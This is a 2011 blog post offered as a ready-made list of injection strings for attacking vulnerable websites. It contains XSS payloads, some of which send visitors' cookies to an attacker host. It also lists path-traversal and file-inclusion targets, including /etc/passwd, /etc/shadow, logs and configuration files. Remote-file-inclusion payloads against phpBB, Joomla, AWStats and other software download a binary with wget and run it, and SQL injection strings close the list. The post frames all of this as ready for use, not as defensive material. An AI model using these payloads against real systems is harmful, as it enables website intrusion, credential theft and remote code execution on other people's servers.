Saturday 22 October 2011

Common XSS, SQL and PHP injection strings ...


Sometimes it happens that we have a site that we can see is vulnerable, but do not know how to use injections; below I present the most common ones, and not only injections ...

XSS
</ Textarea> <script> alert (/ xss /) </ script>
</ Title> <script> alert (/ xss /) </ script>
<script src=http://yoursite.com/your_files.js> </ script>
"> <script> Alert (0) </ script>
<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<marquee> <script> alert ('XSS') </ script> </ marquee>
<? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?>
<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style>
<img src=foo.png onerror=alert(/xssed/) />
<script> alert (String.fromCharCode (88,83,83)) </ script>
<Scr <script> ipt> alert ('XSS');</ scr </ script> ipt>
<script>location.href="http://www.yourevilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<script src="http://www.yourevilsite.org/cookiegrabber.php"> </ script>
<script> alert ('XSS');</ script>
<script> alert (1); </ script>
<IMG LOWSRC = \ "javascript: Alert ('XSS') \ ">
<IMG DYNSRC = \ "javascript: Alert ('XSS') \ ">
<font style='color:expression(alert(document.cookie))'>
<Img src = "javascript: Alert ('XSS') ">
<script language="JavaScript"> alert ('XSS') </ script>


<Body onunload = "javascript: Alert ('XSS');">
<Body onLoad = "alert ('XSS');"
[Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color]
"/></ A ></>< img src = 1.gif onerror = alert (1)>
window.alert ("Bonjour!");
<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe>
"> <Script alert (String.fromCharCode (88,83,83)) </ script>
'>> <marquee> <h1> XSS </ h1> </ marquee>
'">>< Script> alert ('XSS') </ script>
'">>< Marquee> <h1> XSS </ h1> </ marquee>
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript: Alert ('XSS'); \ ">
<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://; URL = javascript: Alert ('XSS'); \ ">
<script> var var = 1; alert (var) </ script>
<STYLE Type="text/css"> BODY {background: url ("javascript: Alert ('XSS')")}</ STYLE>

<?='< SCRIPT> alert ("XSS") </ SCRIPT> '?>
<IMG SRC = 'vbscript: Msgbox (\ "XSS \") '>
"Onfocus = alert (document.domain)"> <"
<FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </ FRAMESET>
<STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</ STYLE> <UL> <LI> XSS
perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out
perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out
<br size=\"&{alert('XSS')}\">

Files requested via PHP include / path traversal

/ Etc / passwd
/ Etc / shadow
/ Etc / group
/ Etc / security / group
/ Etc / security / passwd
/ Etc / security / user
/ Etc / security / environ
/ Etc / security / limits
/ Usr / lib / security / mkuser.default
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_ log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access. log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
../../../../../../../var/log/apache2/access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
../../../../../../../var/log/apache2/access.log
.. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_l og
.. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.l og
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
../../../../../../../var/log/apache2/error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / Var / log / error.log

Apache


.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / Apache / logs / error.log
.. / Apache / logs / access.log
.. / .. / Apache / logs / error.log
.. / .. / Apache / logs / access.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
.. / Logs / error.log
.. / Logs / access.log
.. / .. / Logs / error.log
.. / .. / Logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / httpd / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / lampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ logs \ error.log
.. / .. / .. / Apache / logs / error.log
.. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Apache / logs / access.log
.. / .. / .. / Logs / error.log
.. / .. / .. / Logs / access.log
.. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / Logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / acces.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / access.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / www / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / logs / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / apache / error.log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / access_log
.. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / .. / Var / log / error_log

conf


.. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / Usr / local / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / apache / conf / httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / etc / httpd / conf / httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / apache / conf / httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / .. / Usr / local / apps / apache / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / apache / conf / httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / conf / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / conf / httpd.conf
../../../../../../etc/apache2/httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / http / httpd.conf
.. / .. / .. / .. / .. / .. / Etc / httpd.conf
.. / .. / .. / .. / .. / Opt / apache / conf / httpd.conf
../../../../../opt/apache2/conf/httpd.conf
.. / .. / .. / .. / Var / www / conf / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf
.. / .. / .. / Private / etc / httpd / httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf
.. / .. / Volumes / webBackup / private / etc / httpd / httpd.conf.default
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ Apache Group \ Apache2 \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Program Files \ xampp \ apache \ conf \ httpd.conf
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/ Usr / local / etc / apache / vhosts.conf

php.ini


.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Bin / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / httpd / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / lib / php / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / lib / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / php / lib / php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / apache / conf / php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / php.ini
../../../../../../../../../etc/php/php4/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / apache / php.ini
../../../../../../../../../etc/php/apache2/php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Web / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Usr / local / Zend / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Opt / xampp / etc / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Var / local / www / conf / php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Etc / php / cgi / php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5 \ php.ini
../../../../../../../../../php4 \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / PHP \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINDOWS \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / WINNT \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Apache \ php \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Xampp \ apache \ bin \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / NetServer \ bin \ stable \ apache \ php.ini
../../../../../../../../../home2 \ bin \ stable \ apache \ php.ini
.. / .. / .. / .. / .. / .. / .. / .. / .. / Home \ bin \ stable \ apache \ php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini

CPanel:
* log


/ Usr / local / cpanel / logs
/ Usr / local / cpanel / logs / stats_log
/ Usr / local / cpanel / logs / access_log
/ Usr / local / cpanel / logs / error_log
/ Usr / local / cpanel / logs / license_log
/ Usr / local / cpanel / logs / login_log
/ Usr / local / cpanel / logs / stats_log
* Conf
/ Var / cpanel / cpanel.config


MySQL:
* log


/ Var / log / mysql / mysql-bin.log
/ Var / log / mysql.log
/ Var / log / mysqlderror.log
/ Var / log / mysql / mysql.log
/ Var / log / mysql / mysql-slow.log
/ Var / mysql.log
* Conf
/ Var / lib / mysql / my.cnf
/ Etc / mysql / my.cnf
/ Etc / my.cnf

MySQL (Windows):
+ log conf

C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ hostname.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql.err
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ data \ hostname.err
C: \ Program Files \ MySQL \ data \ mysql.log
C: \ Program Files \ MySQL \ data \ mysql.err
C: \ Program Files \ MySQL \ data \ mysql-bin.log
C: \ MySQL \ data \ hostname.err
C: \ MySQL \ data \ mysql.log
C: \ MySQL \ data \ mysql.err
C: \ MySQL \ data \ mysql-bin.log
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.ini
C: \ Program Files \ MySQL \ MySQL Server 5.0 \ my.cnf
C: \ Program Files \ MySQL \ my.ini
C: \ Program Files \ MySQL \ my.cnf
C: \ MySQL \ my.ini
C: \ MySQL \ my.cnf

FTP


ProFTPD:
* Log
/ Etc / logrotate.d / proftpd
/ Www / logs / proftpd.system.log
/ Var / log / proftpd
* Conf
/ Etc / proftp.conf
/ Etc / protpd / proftpd.conf
/ Etc/vhcs2/proftpd/proftpd.conf
/ Etc / proftpd / modules.conf

vsftpd:
* Log
/ Var / log / vsftpd.log
/ Etc / vsftpd.chroot_list
/ Etc / logrotate.d / vsftpd.log
* Conf
/ Etc / vsftpd / vsftpd.conf
/ Etc / vsftpd.conf
/ Etc / chrootUsers

wu-ftpd:
* Log
/ Var / log / xferlog
/ Var / adm / log / xferlog
* Conf
/ Etc / wu-ftpd / ftpaccess
/ Etc / wu-ftpd / ftphosts
/ Etc / wu-ftpd / ftpusers

Pure-FTPd:
* Conf
/ Usr / sbin / pure-config.pl
/ Usr / etc / pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.conf
/ Usr / local / etc / pure-ftpd.conf
/ Usr / local / etc / pureftpd.pdb
/ Usr / local / pureftpd / etc / pureftpd.pdb
/ Usr / local / pureftpd / sbin / pure-config.pl
/ Usr / local / pureftpd / etc / pure-ftpd.conf
-/etc/pure-ftpd.conf
/ Etc / pure-ftpd / pure-ftpd.pdb
/ Etc / pureftpd.pdb
/ Etc / pureftpd.passwd
/ Etc / pure-ftpd / pureftpd.pdb
DragonflyBSD & FreeBSD: / usr / ports / ftp / pure-ftpd /
OpenBSD: / usr / ports / net / pure-ftpd /
NetBSD: / usr / pkgsrc / net / pureftpd /
Crux Linux: / usr / ports / contrib / pure-ftpd /
* Log
/ Var / log / pure-ftpd / pure-ftpd.log
/ Logs / pure-ftpd.log
/ Var / log / pureftpd.log

Other:
/ Var / log / ftp-proxy / ftp-proxy.log
/ Var / log / ftp-proxy
/ Var / log / ftplog
/ Etc / logrotate.d / ftp
/ Etc / ftpchroot
/ Etc / ftphosts

Mail Server


/ Var / log / exim_mainlog
/ Var / log / exim / mainlog
/ Var / log / maillog
/ Var / log / exim_paniclog
/ Var / log / exim / paniclog
/ Var / log / exim / rejectlog
/ Var / log / exim_rejectlog


PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/ PMA / main.php
/ Admin / main.php
/ Admin / mysql / main.php
/ Admin / phpmyadmin / main.php
/ Admin / pma / main.php
/ Db / main.php
/ Dbadmin / main.php
/ Main.php
/ Myadmin / main.php
/ Mysql-admin/main.php
/ Mysql / main.php
/ Mysqladmin / main.php
/ PhpMyAdmin-2.2.3/main.php
/ PhpMyAdmin-2.2.6/main.php
/ PhpMyAdmin-2.5.1/main.php
/ PhpMyAdmin-2.5.4/main.php
/ PhpMyAdmin-2.5.6/main.php
/ Phpmyadmin / main.php
/ Phpmyadmin2/main.php
/ Web / phpMyAdmin / main.php
/ PMA / read_dump.php
/ Db / read_dump.php
/ Dbadmin / read_dump.php
/ myadmin / read_dump.php
/ Mysql / read_dump.php
/ Mysqladmin / read_dump.php
/ PhpMyAdmin% 202.6.4-pl4/read_dump.php
/ PhpMyAdmin% 202.7.0-beta1/read_dump.php
/ PhpMyAdmin% 202.7.0-pl1/read_dump.php
/ PhpMyAdmin% 202.7.0-rc1/read_dump.php
/ PhpMyAdmin% 202.7.0/read_dump.php
/ PhpMyAdmin-2.2.3/read_dump.php
/ PhpMyAdmin-2.2.7-pl1/read_dump.php
/ PhpMyAdmin-2.5.6/read_dump.php
/ PhpMyAdmin-2.5.7-pl1/read_dump.php
/ PhpMyAdmin-2.6.0-pl3/read_dump.php
/ PhpMyAdmin-2.6.0/read_dump.php
/ PhpMyAdmin-2.6.1-pl3/read_dump.php
/ PhpMyAdmin-2.6.3-pl1/read_dump.php
/ PhpMyAdmin-2.6.4/read_dump.php
/ Phpadmin / read_dump.php
/ Phpmyadmin / read_dump.php
/ Phpmyadmin1/read_dump.php
/ Phpmyadmin2/read_dump.php
/ Typo3/phpmyadmin/read_dump.php
/ Web / phpMyAdmin / read_dump.php
/ Xampp / phpmyadmin / read_dump.php

Some PHP scripts

/ DE/index2.php
/ FR/index2.php
/ NL/index2.php
/ US/index2.php
/ Cms / index.php
/ Cms/index2.php
/ Cvs / index.php
/ Cvs/index2.php
/ Index.php
/ Index2.php
/ Mambo / index.php
/ Mambo/index2.php
/ Mb / index.php
/ Mb/index2.php
/ Site/index2.php
/ V1/index2.php
/ V2/index2.php
/ V3/index2.php

phpBB

/ Modules / Forums / admin / admin_styles.php
/ Forums / admin / admin_styles.php
/ Includes / functions.php
/ Includes / functions_nomoketos_rules.php
/ Modules / Forums / admin / admin_mass_email.php
/ Modules / Forums / admin / index.php
phpbb_root_path = http://XXX.XXX.XX.XX/cmd.dat?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Coppermine


Target
Coppermine
Files Requested
/ Modules / coppermine / themes / default / theme.php
Payload
THEME_DIR = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/cbac; chmod% 20 744% 20cbac;. / cbac; echo% 20YYY; echo |

Mambo / Joomla Content Management System
/ Index.php
/ Index2.php
/ Mambo/index2.php
/ Cvs/index2.php
/ Cvs/mambo/index2.php
/ Php/mambo/index2.php
/ Cbcms / mod_cbsms_messages.php
/ Components / com_extcalendar / admin_events.php
/ Components / com_forum / download.php
/ Components / com_galleria / galleria.html.php
/ Components / com_hashcash / server.php
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/ Components / com_loudmounth / includes / abbc / abbc.class.php
/ Components / com_pcchess / include.pcchess.php
/ Components / com_pccookbook / pccookbook.php
/ Components / com_performs / performs.php
/ Components / com_pollxt / conf.pollxt.php
/ Components/com_rsgallery2/rsgallery.html.php
/ Components / com_smf / smf.php
/ Components / com_simpleboard / file_upload.php
/ Components / com_sitemap / sitemap.xml.php
/ Components / com_videodb / core / videodb.class.xml.php
/ Mod_cbsms_messages.php
Payload
_REQUEST [Option] = com_content
_REQUEST [Itemid] = 1
GLOBALS =
mosConfig_absolute_path = http://XXX.XXX.XX.XX/cmd.gif?
cmd = cd% 20/tmp; wget% 20XXX.XXX.XX.XX/micu; chmod% 20 744% 20micu;. / micu; echo% 20YYY; echo |
CONFIG_EXT [LANGUAGES_DIR] = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path = http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id

Wordpress, Drupal and others ...

/ Blog / xmlrpc.php
/ Blog / xmlsrv / xmlrpc.php
/ Blogs / xmlsrv / xmlrpc.php
/ Drupal / xmlrpc.php
/ Phpgroupware / xmlrpc.php
/ Wordpress / xmlrpc.php
/ Xmlrpc.php
/ Xmlrpc / xmlrpc.php
/ Xmlsrv / xmlrpc.php

AWStats

/ Awstats / awstats.pl
/ Cgi-bin/awstats.pl
/ Cgi-bin/awstats/awstats.pl
Payload
configdir = | echo; echo% 20YYY; cd% 20% 2ftmp% 3bwget% 20XX X% 2eXXX% 2eXX% 2eXX% 2fmirela% 3bchmod% 20% 2bx% 20mirela%

3b% 2e% 2fmirela; echo% 20YYY; echo |
Microsoft Applications / Extensions
Code:
/ 5c/_vti_bin/owssvr.dll
/ 5c/MSOffice/cltreq.asp
Payload
UL = 1 & ACT = 4 & BUILD = 6551 & STRMVER = 4 & CAPREQ = 0

DBImageGallery


/ Admin / attributes.php
/ Admin / images.php
/ Admin / scan.php
/ Includes / attributes.php
/ Includes / db_utils.php
/ Includes / images.php
/ Includes / utils.php
/ Includes / values.php
Payload
donsimg_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

DBGuestbook

/ Includes / guestbook.php
/ Includes / utils.php
/ Includes / views.php
Payload
dbs_base_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
Ultimate Fun Book
Code:
/ Board / / function.php
/ Funboard / function.php
/ Function.php
Payload
gbpfad = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /


Sinapis Forum CMS

/ Sinapis.php
/ Forum / / sinapis.php
/ FO / sinapis.php
Payload
fuss = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

Admin Phorum

PhpForums Admin Phorum
Files Requested
/ Actions / del.php
Payload
include_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PMB Services
Code:
/ Cnl_prod / pmb / opac_css / includes / resa_func.inc.php
/ Pmb / opac_css / includes / resa_func.inc.php
/ Opac_css / includes / resa_func.inc.php
Payload
class_path = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
PHP-MIP
Code:
/ Php / top.php
/ Phpmip / / top.php
/ Top.php
Payload
laypath = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /

SendStudio

Files Requested
/ Sendstudio / admin / includes / createemails.inc.php
/ Sendstudio / admin / includes / send_emails.inc.php
Payload
ROOTDIR = http://XXX.XXX.XX.XXX/ ~ lisir / M.txt? & /
 


SQL

'
"
#
-
-
'-
- ';
';
= '
=;
= -
\ X23
\ X27
\ X3D \ x3B '
\ X3D \ x27
\ X27 \ x4F \ x52 SELECT *
\ X27 \ x6F \ x72 SELECT *
'Or select *
admin' -
'; Shutdown -
<>"'%;)(&+
'Or''='
'Or' x '=' x
"Or" x "=" x
') Or (' x '=' x
